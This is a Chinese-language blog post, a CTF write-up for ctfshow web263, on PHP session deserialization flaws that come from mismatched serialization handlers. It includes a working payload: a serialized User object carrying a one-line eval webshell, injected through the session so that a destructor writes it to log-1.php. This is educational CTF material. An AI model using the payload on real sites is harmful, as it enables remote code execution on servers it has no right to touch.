PHP session反序列化漏洞

最新推荐文章于 2024-04-12 01:10:06 发布
最新推荐文章于 2024-04-12 01:10:06 发布
阅读量339 收藏 1
点赞数
分类专栏: Web安全 CTF php 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/119643775
版权
CTF 同时被 3 个专栏收录
21 篇文章 2 订阅
订阅专栏
Web安全
6 篇文章 4 订阅
订阅专栏
php
4 篇文章 0 订阅
订阅专栏
博客探讨了PHP session反序列化漏洞的概念,通过实例展示了不同序列化处理器下session文件的内容变化,并详细解释了如何利用此漏洞在CTFshowweb263wp挑战中构造序列化字符串,最终实现写马。文中还介绍了如何通过修改cookie中的PHPSESSID来触发漏洞,完成恶意操作。
摘要由CSDN通过智能技术生成

文章目录

session反序列化

看群主的讲解视频,顺便做个笔记。
先在本地做个测试,在index.php中写如下代码

<?php

session_start();
$_SESSION['aaa'] = 'bbb';

此时php的临时目录(tmp)中没有任何文件,然后访问http://127.0.0.1/,清除所有的cookie,然后再次访问,发现又生成了一个PHPSESSID
请添加图片描述
而此时tmp文件夹中也有一个临时文件sess_u8or65tgg0q5rpso3qegdhmlk2,文件内容是

aaa|s:3:"bbb";

再看另一种php序列化的形式

<?php

ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['aaa'] = 'bbb';

再次访问,可以发现sess_u8or65tgg0q5rpso3qegdhmlk2文件的内容变成了

a:1:{s:3:"aaa";s:3:"bbb";}

再用一个类

<?php

// ini_set('session.serialize_handler', 'php_serialize');
session_start();
class user{
    public $username='admin';
}
$user=new user();

$_SESSION['user'] = $user;

文件内容是

user|O:4:"user":1:{s:8:"username";s:5:"admin";}

再用php序列化的方式,文件内容

a:1:{s:4:"user";O:4:"user":1:{s:8:"username";s:5:"admin";}}

两个方式最大的区别就是前者都有一个默认的分隔符|,如果是

a:1:{s:4:"user";O:4:"user":1:{s:8:"username";s:5:"ad|min";}}

用php序列化的处理器来解析,是没有问题的,但是用默认php的处理器,就会出现解析的漏洞

ctfshow web263 wp

在inc.php中,

ini_set('session.serialize_handler', 'php');

class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

可以发现ini_set('session.serialize_handler', 'php');,即用的php默认处理器来处理,也存在危险函数file_put_contents(),可以直接写马。

先构造序列化字符串,然后存入session,看文本内容是什么样的:

<?php

session_start();
class User
{
    public $username;
    public $password;
    public $status;

    function __construct($username, $password)
    {
        $this->username = $username;
        $this->password = $password;
    }

    function setStatus($s)
    {
        $this->status = $s;
    }
}

$user = new User('1.php', '<?php @eval($_POST[a]);?>');
$_SESSION['user'] = $user;

文件内容:

user|O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:25:"<?php @eval($_POST[a]);?>";s:6:"status";N;}

再用php序列化处理器,文件内容:

a:1:{s:4:"user";O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:25:"<?php @eval($_POST[a]);?>";s:6:"status";N;}}

这题是用的php默认处理器,只要把php序列化处理器的内容在最左边加上|,就会把右侧的内容全部反序列化,从而写马。
先在index.php页面把cookie中PHPSESSID换成

|O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:25:"<?php @eval($_POST[a]);?>";s:6:"status";N;}

并访问index.php,然后访问check.php?u=admin&pass=123,并把PHPSESSID换成MQ==,此时就会在log-1.php中生成木马。

Lum1n0us
关注
专栏目录
php Session反序列化漏洞
lonmar的博客
10-27 559
PHP Session 序列化及反序列化处理器 PHP 内置了多种处理器用于存取 $_SESSION 数据时会对数据进行序列化和反序列化,常用的有以下三种,对应三种不同的处理格式: 有关session的配置 session.save_path="" --设置session的存储路径 session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen--指定会话模块是否在请求开始时
深入浅析PHPsession反序列化漏洞问题
10-19
主要介绍了PHPsession反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞
11-15 211
【序列化简单利用】    serialize()序列化:使用函数serialize()可将实例序列化为字符串  unserialize()反序列化:使用函数unserialize()可将序列化的字符串还原 代码示例: <?php class Example { var $var = ''; function __destruct() { ...
php session反序列化漏洞详解
qq_39511050的博客
10-25 884
php session反序列化漏洞详解
PHPsession反序列化漏洞
weixin_51706044的博客
09-28 652
带你走进session 在学习 session 反序列化之前,我们需要了解这几个参数的含义。 Directive 含义 session.save_handler session保存形式。默认为files session.save_path session保存路径。 session.serialize_handler session序列化存储所用处理器。默认为phpsession.upload_progress.cleanup 一旦读取了所有POST数据,立即清除进度信息。默认
PHP session反序列化漏洞原理解析
小王的储物间
01-12 677
官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。session保存的位置是在服务器端session通常是要配合cookie使用因为HTTP的无状态性,服务端产生了session来标识当前的用户状态本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**
session反序列化漏洞
07-28
回答: Session反序列化漏洞是一种利用PHP处理器和PHP序列化处理器之间的差异来注入恶意代码的漏洞。当序列化存储Session数据与反序列化读取Session数据的方式不同时,就可以利用这种差异来进行攻击。具体来说,通过...
php反序列化漏洞——session反序列化漏洞
m0_73756016的博客
03-31 1381
session在网络应用中称为“会话控制”,是服务器为了保存用户状态而创建的一个特殊的对象。简而言之,session就是一个对象,用于存储信息。
PHP序列化之Session反序列化漏洞
Firebasky的博客
08-14 713
本文内容主要是出各位师傅那里获取来的,主要是用于记录学习,和自己的一些心得体会。 Session反序列化漏洞 要了解这个漏洞必须知道Session序列化机制。 PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 配置文件php.ini中含有这几个与session存储配置相关的配置项: session.save_path="" --设置session的存储路径,默认在/tmp session.auto_start --指定会话模块是否在请求开始时启动一个会话,默认为0不启动.
phpsession反序列化选择器漏洞造成命令执行
热门推荐
Love&Share
10-21 1万+
PHP三种session序列化选择器 ​ 首先了解下php session的三种存储方式,php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。 存储的文件是以sess_sessionid来进行命名的,文件的内容就是session值的序列话之后的内容。 在php.ini中存在三项配置项: session.save_path=""–设置session的存储路径 session.save_
php反序列化漏洞(万字详解)
最新发布
2401_83947434的博客
04-12 951
序列化是将对象或数组转化为方便存储、传输的字符串,php使用serialize()函数将对象序列化;序列化只作用于对象的成员属性,不序列化成员方法;反序列化是将序列化得到的字符串转化为一个对象的过程;反序列化生成的对象的成员属性值由被反序列化的字符串决定,与原来类预定义的值无关;反序列化使用unserialize()函数将字符串转换为对象,序列化使用serialize()函数将对象转化为字符串;//反序列化phpclass tests:3:"666";s:1:"b";i:6666;}';
php反序列化
n1ght的博客
11-30 780
php反序列化,和phpsession反序列化php原生类
php漏洞
12-12 638
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在 很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.     我对目前常见的PHP漏洞做了一下总结,大致分为以下几种包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于 COOKI
php session漏洞,PHP session反序列化漏洞
weixin_29596423的博客
03-17 258
本文实现以下题目:http://web.jarvisoj.com:32784/解题思路:1.session.upload_progress.enabled=On当解题过程如下:1.打开地址,获取如下源代码//Awebshelliswaitforyouini_set('session.serialize_handler','php');session_start();classOowoO...
PHP漏洞session会话劫持
lifushan123的专栏
04-03 935
提交 http://www.91ri.org/ attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45 此ID为获取到的客户session id,刷新客户页面以后客户购买的商品变成了2000 session固定攻击 黑客可以使用把session id发给用户的方式,来完成攻击 http://localhost/index.php?user=dodo&PH
PHPPHP网站常见一些安全漏洞及防御方法
A1_3_9_7的博客
02-23 1698
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
PHP session反序列化漏洞详解与配置
"深入探讨PHPsession反序列化漏洞及其配置选项" 在PHP编程中,session管理是一个至关重要的部分,它用于跟踪用户的会话状态。然而,如果不妥善处理,session机制可能会引入安全风险,尤其是涉及到session反序列化...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值